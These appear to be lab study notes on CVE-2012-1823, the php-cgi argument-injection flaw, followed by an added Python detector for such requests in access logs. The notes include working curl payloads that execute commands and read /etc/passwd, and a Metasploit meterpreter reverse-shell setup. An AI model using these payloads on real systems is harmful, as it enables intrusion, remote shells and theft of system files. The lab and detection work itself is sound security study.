CVE-2012-1823 Study Notes
Source: Internet  Published: 中标麒麟软件大全  Editor: 程序博客网  Date: 2024/05/05 14:56
References:
https://pentesterlab.com/exercises/cve-2012-1823/course
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
    user@debian:~$ php-cgi -h
    Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>]
           php <file> [args...]
      -a               Run interactively
      -b <address:port>|<port> Bind Path for external FASTCGI Server mode
      -C               Do not chdir to the script's directory
      -c <path>|<file> Look for php.ini file in this directory
      -n               No php.ini file will be used
      -d foo[=bar]     Define INI entry foo with value 'bar'
      -e               Generate extended information for debugger/profiler
      -f <file>        Parse <file>.  Implies `-q'
      -h               This help
      -i               PHP information
      -l               Syntax check only (lint)
      -m               Show compiled in modules
      -q               Quiet-mode.  Suppress HTTP Header output.
      -s               Display colour syntax highlighted source.
      -v               Version number
      -w               Display source with stripped comments and whitespace.
      -z <file>        Load Zend extension <file>.
      -T <count>       Measure execution time of script repeated <count> times.
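A query string that contains no `=` is handed to php-cgi as command-line arguments, and `-s` is the switch that displays highlighted source. So we try http://192.168.170.133/index.php?-s
or http://192.168.170.133/?-s
Either request displays the source code of the file index.php.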
将『
    ➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('uname -a');die(); ?>"
    Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
    ➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('cat /etc/passwd');die(); ?>"
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    ...
Exploiting with Metasploit
    # php-cgi.msf
    use exploit/multi/http/php_cgi_arg_injection
    set RHOST 192.168.170.133
    set RPORT 80
    set PAYLOAD php/meterpreter/reverse_tcp
    set LHOST 192.168.170.132
    exploit
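On the detection side, the following added example (not part of the original post) flags access-log entries whose query string has no raw `=` and decodes to a `-` switch, which is the shape of the `?-s` and `?-d+...` requests shown above. The log lines are constructed samples, and the function names and the host 192.168.170.50 are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def looks_like_cgi_arg_injection(target):
    """True if the query string would reach php-cgi as command-line switches."""
    _, sep, query = target.partition("?")
    if not sep or not query:
        return False
    # Checked before decoding: only a raw '=' stops the query from being
    # treated as arguments; the encoded form %3d does not.
    if "=" in query:
        return False
    # '+' separates arguments and %xx escapes are decoded, so %2ds is "-s".
    return any(arg.startswith("-") for arg in unquote_plus(query).split())


def scan(lines):
    """Return (client, method, target) for each suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and looks_like_cgi_arg_injection(m["target"]):
            hits.append((line.split()[0], m["method"], m["target"]))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.168.170.132 - - [05/May/2012:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 5120',
    '192.168.170.132 - - [05/May/2012:10:00:09 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 87',
    '192.168.170.132 - - [05/May/2012:10:00:15 +0000] "GET /index.php?%2ds HTTP/1.1" 200 5120',
    '192.168.170.50 - - [05/May/2012:10:01:02 +0000] "GET /index.php?page=-1 HTTP/1.1" 200 734',
    '192.168.170.50 - - [05/May/2012:10:01:30 +0000] "GET /search.php?q=a-b&sort=-date HTTP/1.1" 200 912',
    '192.168.170.50 - - [05/May/2012:10:02:11 +0000] "GET /lookup?hello+world HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for client, method, target in scan(SAMPLE_LOG):
        print(f"suspicious: {client} {method} {target}")
```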